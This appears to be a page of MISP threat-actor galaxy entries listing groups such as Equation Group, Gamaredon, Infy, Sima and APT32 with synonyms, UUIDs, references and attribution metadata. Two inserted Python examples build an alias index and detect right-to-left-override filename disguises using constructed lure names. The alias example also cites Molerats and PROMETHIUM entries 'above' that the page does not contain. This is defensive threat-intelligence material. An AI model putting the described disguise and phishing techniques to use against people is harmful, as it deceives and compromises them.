Founded in 2004, Turkhackteam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteam’s forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TurkHackTeam.
Known Synonyms |
---|
Turk Hack Team |
Internal MISP references
UUID 7ae74dc6-ded3-4873-a803-abb4160d10c0
which can be used as unique global reference for TurkHackTeam
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
Equation Group
The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Lab as one of the most sophisticated cyber attack groups in the world, operating alongside, but always from a position of superiority over, the creators of Stuxnet and Flame.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Equation Group.
Known Synonyms |
---|
EQGRP |
G0020 |
Tilded Team |
Internal MISP references
UUID 7036fb3d-86b7-4d9c-bc66-1e1ead8b7840
which can be used as unique global reference for Equation Group
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/Equation_Group - webarchive
- https://www.cfr.org/interactive/cyber-operations/equation-group - webarchive
- https://arstechnica.com/information-technology/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/ - webarchive
- https://www.dropbox.com/s/buxkfotx1kei0ce/Whitepaper%20Shadow%20Broker%20-%20Equation%20Group%20Hack.pdf?dl=0 - webarchive
- https://en.wikipedia.org/wiki/Stuxnet - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf - webarchive
- https://attack.mitre.org/groups/G0020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United States |
cfr-suspected-victims | ['Iran', 'Afghanistan', 'Syria', 'Yemen', 'Kenya', 'Russia', 'India', 'Mali', 'Algeria', 'United Kingdom', 'Pakistan', 'China', 'Lebanon', 'United Arab Emirates', 'Libya'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | US |
Greenbug
Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.
Internal MISP references
UUID 47204403-34c9-4d25-a006-296a0939d1a2
which can be used as unique global reference for Greenbug
in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/ - webarchive
- https://threatpost.com/shamoon-collaborator-greenbug-adopts-new-communication-tool/125383/ - webarchive
- https://www.clearskysec.com/greenbug/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
targeted-sector | ['Education', 'Energy', 'Investment', 'Aerospace', 'Government, Administration'] |
Gamaredon Group
Unit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013. In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their technical capabilities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gamaredon Group.
Known Synonyms |
---|
ACTINIUM |
Actinium |
Aqua Blizzard |
Blue Otso |
BlueAlpha |
DEV-0157 |
G0047 |
IRON TILDEN |
PRIMITIVE BEAR |
Shuckworm |
Trident Ursa |
UAC-0010 |
Winterflounder |
Internal MISP references
UUID 1a77e156-76bc-43f5-bdd7-bd67f30fbbbb
which can be used as unique global reference for Gamaredon Group
in MISP communities and other software using the MISP galaxy
External references
- http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://www.lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_Final.pdf - webarchive
- https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://attack.mitre.org/groups/G0047 - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/tree/master/Russia/APT/Gamaredon - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine - webarchive
- https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations - webarchive
- https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game - webarchive
- https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2019-1212.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/tridentursa - webarchive
- https://cert.gov.ua/article/1229152 - webarchive
- https://cert.gov.ua/article/971405 - webarchive
- https://cert.gov.ua/article/40240 - webarchive
- https://cert.gov.ua/article/39386 - webarchive
- https://cert.gov.ua/article/39086 - webarchive
- https://cert.gov.ua/article/39138 - webarchive
- https://cert.gov.ua/article/18365 - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine', 'Germany'] |
cfr-target-category | ['Government'] |
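The synonym tables and UUIDs in these entries are meant to be resolved by machines as well as read: a vendor name such as Gaza Cybergang, ACTINIUM or G0056 should map to exactly one galaxy cluster and one UUID. The Python below is an added example, not part of the MISP galaxy or of this page. It builds an alias index from a constructed JSON excerpt that follows the shape of a MISP galaxy cluster file (a values list whose entries carry value, uuid and meta.synonyms) populated with the Molerats, Gamaredon Group and PROMETHIUM entries above, normalizes case and separators so that pairs like ACTINIUM/Actinium and Gaza Cybergang/Gaza cybergang collapse, validates every UUID, and refuses to build an index in which one alias points at two different clusters.

```python
import json
import re
import uuid

# Constructed excerpt in the shape of a MISP galaxy cluster file (values[] entries
# with value, uuid and meta.synonyms). Names, UUIDs and synonyms are copied from the
# entries on this page; the excerpt itself is not the real threat-actor galaxy.
GALAXY_JSON = json.dumps({
    "name": "Threat Actor",
    "type": "threat-actor",
    "values": [
        {"value": "Molerats",
         "uuid": "f7c2e501-73b1-400f-a5d9-2e2e07b7dfde",
         "meta": {"country": "PS",
                  "synonyms": ["ALUMINUM SARATOGA", "BLACKSTEM", "Extreme Jackal", "G0021",
                               "Gaza Cybergang", "Gaza Hackers Team", "Gaza cybergang",
                               "Moonlight", "Operation Molerats"]}},
        {"value": "Gamaredon Group",
         "uuid": "1a77e156-76bc-43f5-bdd7-bd67f30fbbbb",
         "meta": {"synonyms": ["ACTINIUM", "Actinium", "Aqua Blizzard", "Blue Otso", "BlueAlpha",
                               "DEV-0157", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm",
                               "Trident Ursa", "UAC-0010", "Winterflounder"]}},
        {"value": "PROMETHIUM",
         "uuid": "43894e2a-174e-4931-94a8-2296afe8f650",
         "meta": {"country": "TR", "synonyms": ["G0056", "StrongPity"]}},
    ],
})


def normalize(name):
    """Case-fold and collapse whitespace, underscores and hyphens so that vendor
    spellings such as 'Gaza Cybergang', 'Gaza cybergang' and 'gaza-cybergang' agree."""
    return re.sub(r"[\s_\-]+", " ", name.casefold()).strip()


def build_index(galaxy):
    """Map every normalized cluster value and synonym to (canonical value, uuid).

    Accepts the galaxy as a JSON string or an already-parsed dict. Raises ValueError
    when a UUID is malformed or when one alias would point at two different clusters:
    a silently ambiguous alias table is worse than no table.
    """
    if isinstance(galaxy, str):
        galaxy = json.loads(galaxy)
    index = {}
    for cluster in galaxy["values"]:
        cluster_uuid = str(uuid.UUID(cluster["uuid"]))  # ValueError on a malformed UUID
        canonical = cluster["value"]
        names = [canonical, *cluster.get("meta", {}).get("synonyms", [])]
        for name in names:
            key = normalize(name)
            previous = index.get(key)
            if previous is not None and previous[1] != cluster_uuid:
                raise ValueError(f"alias {name!r} maps to both {previous[1]} and {cluster_uuid}")
            index[key] = (canonical, cluster_uuid)
    return index


def resolve(index, name):
    """Return (canonical value, uuid) for a vendor name, or None if the galaxy has no such alias."""
    return index.get(normalize(name))


def resolve_many(index, names):
    """Resolve a batch of names (for example every actor name in a vendor report) and
    separate the ones the galaxy does not know, so they get reviewed rather than dropped."""
    resolved, unknown = {}, []
    for name in names:
        hit = resolve(index, name)
        if hit is None:
            unknown.append(name)
        else:
            resolved[name] = hit
    return resolved, unknown


if __name__ == "__main__":
    idx = build_index(GALAXY_JSON)
    hits, misses = resolve_many(idx, ["Gaza cybergang", "actinium", "StrongPity", "APT1"])
    for name, (canonical, cluster_uuid) in hits.items():
        print(f"{name:15} -> {canonical} ({cluster_uuid})")
    print("unknown:", misses)
```

Against the full galaxy file the same index is what lets a report that says "Aqua Blizzard" be tagged with the Gamaredon Group cluster rather than creating a fourteenth spelling of the same actor; the collision check is the part worth keeping, because vendor names do occasionally get attached to more than one cluster over time.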
Infy
Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activities against human rights activists in the beginning of 2015. In line with other research on the campaign, released prior to publication of this document, we have adopted the name "Infy", which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group's malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Infy.
Known Synonyms |
---|
Foudre |
Operation Mermaid |
Prince of Persia |
Internal MISP references
UUID 1671be1b-c844-48f5-84c8-54ac4fe4d71e
which can be used as unique global reference for Infy
in MISP communities and other software using the MISP galaxy
External references
- https://www.intezer.com/prince-of-persia-the-sands-of-foudre/ - webarchive
- https://www.freebuf.com/articles/network/105726.html - webarchive
- https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf - webarchive
- https://iranthreats.github.io/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/ - webarchive
- https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/prince-persia - webarchive
- https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-prince-persia-ride-lightning-infy-returns-foudre/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Iran', 'France', 'China', 'Sweden', 'United States', 'United Kingdom', 'Germany', 'Syria', 'Italy', 'Denmark', 'Canada', 'Russia', 'Saudi Arabia', 'Bahrain'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Activists', 'Civil society'] |
Sima
Sima is a group of suspected Iranian origin targeting Iranians in diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human Rights Watch's (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghan refugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director's biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to professionally interact with the subject, then offered validation through links to their biography and social media, the former of which was itself malware as well. The bait documents contained a real article relevant to the targets' interests and the topic referenced, and the message attempted to address how it aligned with their professional research or field of employment. The referenced documents sent were malware binaries posing as legitimate files, using the common right-to-left filename tactic in order to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to a tendency amongst other groups to simply continually send different forms of generic malware or phishing, in the hope that one would eventually be successful.
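The right-to-left filename tactic mentioned above relies on the Unicode RIGHT-TO-LEFT OVERRIDE character (U+202E): a file named Report_<U+202E>cod.scr is drawn by a bidi-aware file browser as Report_rcs.doc, while the operating system still treats it as a .scr executable. The Python below is an added example, not part of the page or of any vendor's tooling. It flags filenames that carry Unicode bidirectional control characters, reports the extension the OS will actually act on, and approximates what the user sees (the segment after the first RLO drawn reversed). The rendering model is a deliberate simplification that ignores nested embeddings and isolates, the sample attachment names are constructed, and the list of executable extensions is an assumption to tune for your environment.

```python
import os
import unicodedata

# Unicode bidirectional controls that can disguise a file's real extension.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200e", "\u200f",                                # LRM, RLM
}

# Extensions Windows will execute; an assumption, tune it per environment.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                         ".vbs", ".vbe", ".hta", ".msi", ".ps1", ".lnk"}


def find_bidi_controls(name):
    """Return (position, codepoint, Unicode name) for every bidi control in the filename."""
    return [(i, f"U+{ord(c):04X}", unicodedata.name(c, "UNKNOWN"))
            for i, c in enumerate(name) if c in BIDI_CONTROLS]


def strip_bidi_controls(name):
    return "".join(c for c in name if c not in BIDI_CONTROLS)


def real_extension(name):
    """The extension the OS acts on. The controls are just characters to splitext,
    so strip them first, otherwise a trailing RLM would hide a real '.scr'."""
    return os.path.splitext(strip_bidi_controls(name))[1].casefold()


def displayed_name(name):
    """Approximate what a bidi-aware file browser shows. Simplified model: everything
    after the first RLO (U+202E) is drawn reversed; other controls are invisible."""
    pos = name.find("\u202e")
    if pos < 0:
        return strip_bidi_controls(name)
    head = strip_bidi_controls(name[:pos])
    tail = strip_bidi_controls(name[pos + 1:])
    return head + tail[::-1]


def assess_filename(name):
    """Combine the three views so a triage script can alert on 'looks like a .doc, runs as .scr'."""
    controls = find_bidi_controls(name)
    ext = real_extension(name)
    return {
        "filename": name,
        "displayed_as": displayed_name(name),
        "real_extension": ext,
        "bidi_controls": controls,
        # Alert only when a control is present AND the true extension is executable;
        # RLM/LRM appear legitimately in Arabic, Hebrew and Persian filenames.
        "suspicious": bool(controls) and ext in EXECUTABLE_EXTENSIONS,
    }


if __name__ == "__main__":
    # Constructed sample attachment names; the first mimics an HRW-themed lure.
    samples = ["HRW_Iran_Afghan_Report_\u202ecod.scr",
               "HRW_Iran_Afghan_Report.docx",
               "photo\u202egnp.js"]
    for s in samples:
        r = assess_filename(s)
        print(f"{r['displayed_as']!r:40} real={r['real_extension']:6} suspicious={r['suspicious']}")
```

Run this over attachment names pulled from mail logs or an EDR file-creation feed; the combination of a bidi control and an executable real extension is rare enough in legitimate traffic that it can be alerted on directly, while the presence of a lone RLM or LRM should stay informational.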
Internal MISP references
UUID 80f9184d-1df3-4ad0-a452-cdb90fe57216
which can be used as unique global reference for Sima
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Blue Termite
Blue Termite is a group of suspected Chinese origin active in Japan.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blue Termite.
Known Synonyms |
---|
Cloudy Omega |
Emdivi |
Internal MISP references
UUID a250af72-f66c-4d02-9f36-ab764ce9fe85
which can be used as unique global reference for Blue Termite
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Japan'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Groundbait
Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.
Internal MISP references
UUID 8ed5e3f0-ed30-4eb8-bbee-4e221bd76d73
which can be used as unique global reference for Groundbait
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | UA |
targeted-sector | ['Separatists'] |
Longhorn
Longhorn has been active since at least 2011. It has used a range of backdoor Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to CFR, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural resource industries for espionage purposes. Some of the tools used by this threat actor were released by WikiLeaks under the name "Vault 7."
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Longhorn.
Known Synonyms |
---|
APT-C-39 |
Lamberts |
PLATINUM TERMINAL |
the Lamberts |
Internal MISP references
UUID 2f3311cd-8476-4be7-9005-ead920afc781
which can be used as unique global reference for Longhorn
in MISP communities and other software using the MISP galaxy
External references
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/longhorn - webarchive
- http://blogs.360.cn/post/APT-C-39_CIA_EN.html - webarchive
- https://www.secureworks.com/research/threat-profiles/platinum-terminal - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United States |
cfr-suspected-victims | ['Global'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | US |
targeted-sector | ['Telecoms', 'Aerospace', 'Energy', 'Education', 'Government, Administration', 'Finance', 'News - Media'] |
Callisto
The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Callisto.
Known Synonyms |
---|
BlueCharlie |
COLDRIVER |
GOSSAMER BEAR |
SEABORGIUM |
Star Blizzard |
TA446 |
Internal MISP references
UUID fbd279ab-c095-48dc-ba48-4bece3dd5b0f
which can be used as unique global reference for Callisto
in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20170417102235/https://www.f-secure.com/documents/996508/1030745/callisto-group - webarchive
- https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe - webarchive
- https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations - webarchive
- https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.darkreading.com/attacks-breaches/russian-apt-bluecharlie-swaps-infrastructure-to-evade-detection - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
targeted-sector | ['Government, Administration', 'Military', 'Think Tanks', 'Journalist'] |
APT32
Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT32.
Known Synonyms |
---|
APT 32 |
APT-32 |
APT-C-00 |
ATK17 |
BISMUTH |
Canvas Cyclone |
Cobalt Kitty |
G0050 |
Ocean Buffalo |
Ocean Lotus |
OceanLotus |
OceanLotus Group |
POND LOACH |
Sea Lotus |
SeaLotus |
TIN WOODLAWN |
Internal MISP references
UUID aa29ae56-e54b-47a2-ad16-d3ab0242d5d7
which can be used as unique global reference for APT32
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0050/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/ - webarchive
- https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/ - webarchive
- https://www.brighttalk.com/webcast/10703/261205 - webarchive
- https://github.com/eset/malware-research/tree/master/oceanlotus - webarchive
- https://www.cfr.org/interactive/cyber-operations/ocean-lotus - webarchive
- https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ - webarchive
- https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html - webarchive
- https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them - webarchive
- https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Vietnam |
cfr-suspected-victims | ['China', 'Germany', 'United States', 'Vietnam', 'Philippines', 'Association of Southeast Asian Nations'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | VN |
targeted-sector | ['Dissidents', 'Government, Administration', 'Journalist'] |
SilverTerrier
As these tools rise and fall in popularity (and more importantly, as detection rates by antivirus vendors improve), SilverTerrier actors have consistently adopted new malware families and shifted to the latest packing tools available.
Internal MISP references
UUID acbfd9e4-f78c-4ae0-9b52-c35ed679e546
which can be used as unique global reference for SilverTerrier
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | NG |
WildNeutron
A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not state-sponsored but rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies that have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WildNeutron.
Known Synonyms |
---|
Butterfly |
Morpho |
Sphinx Moth |
Internal MISP references
UUID e7df3572-0c96-4968-8e5a-803ef4219762
which can be used as unique global reference for WildNeutron
in MISP communities and other software using the MISP galaxy
External references
- https://www.symantec.com/connect/blogs/butterfly-profiting-high-level-corporate-attacks - webarchive
- https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/ - webarchive
- https://research.kudelskisecurity.com/2015/11/05/sphinx-moth-expanding-our-knowledge-of-the-wild-neutron-morpho-apt/ - webarchive
- https://blog.twitter.com/official/en_us/a/2013/keeping-our-users-secure.html - webarchive
- https://www.facebook.com/notes/facebook-security/protecting-people-on-facebook/10151249208250766 - webarchive
- https://www.reuters.com/article/us-apple-hackers/exclusive-apple-macs-hit-by-hackers-who-targeted-facebook-idUSBRE91I10920130219 - webarchive
- https://blogs.technet.microsoft.com/msrc/2013/02/22/recent-cyberattacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
PLATINUM
PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PLATINUM.
Known Synonyms |
---|
ATK33 |
G0068 |
TwoForOne |
Internal MISP references
UUID 1fc5671f-5757-43bf-8d6d-a9a93b03713a
which can be used as unique global reference for PLATINUM
in MISP communities and other software using the MISP galaxy
External references
- http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf - webarchive
- https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/ - webarchive
- https://attack.mitre.org/groups/G0068/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Defense', 'Government, Administration', 'Diplomacy', 'Intelligence', 'Telecoms'] |
RASPITE
Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicates the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RASPITE.
Known Synonyms |
---|
LeafMiner |
Raspite |
Internal MISP references
UUID 2c8994ba-367c-46f6-bfb0-390c8760dd9e
which can be used as unique global reference for RASPITE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
since | 2017 |
targeted-sector | ['Electric'] |
victimology | Electric utility sector |
FIN8
FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN8.
Known Synonyms |
---|
ATK113 |
G0061 |
Internal MISP references
UUID a78ae9fe-71cd-4563-9213-7b6260bd9a73
which can be used as unique global reference for FIN8
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html - webarchive
- https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html - webarchive
- https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf - webarchive
- https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html - webarchive
- https://attack.mitre.org/groups/G0061 - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Entertainment', 'Hospitality', 'Retail'] |
El Machete
El Machete is one of these threats that was first publicly disclosed and named by Kaspersky (see the Securelist report listed under external references). We’ve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular El Machete.
Known Synonyms |
---|
APT-C-43 |
G0095 |
Machete |
machete-apt |
Internal MISP references
UUID 827c17e0-c3f5-4ad1-a4f4-30a40ed0a2d3
which can be used as unique global reference for El Machete
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0095/ - webarchive
- https://securelist.com/el-machete/66108/ - webarchive
- https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/machete - webarchive
- https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html - webarchive
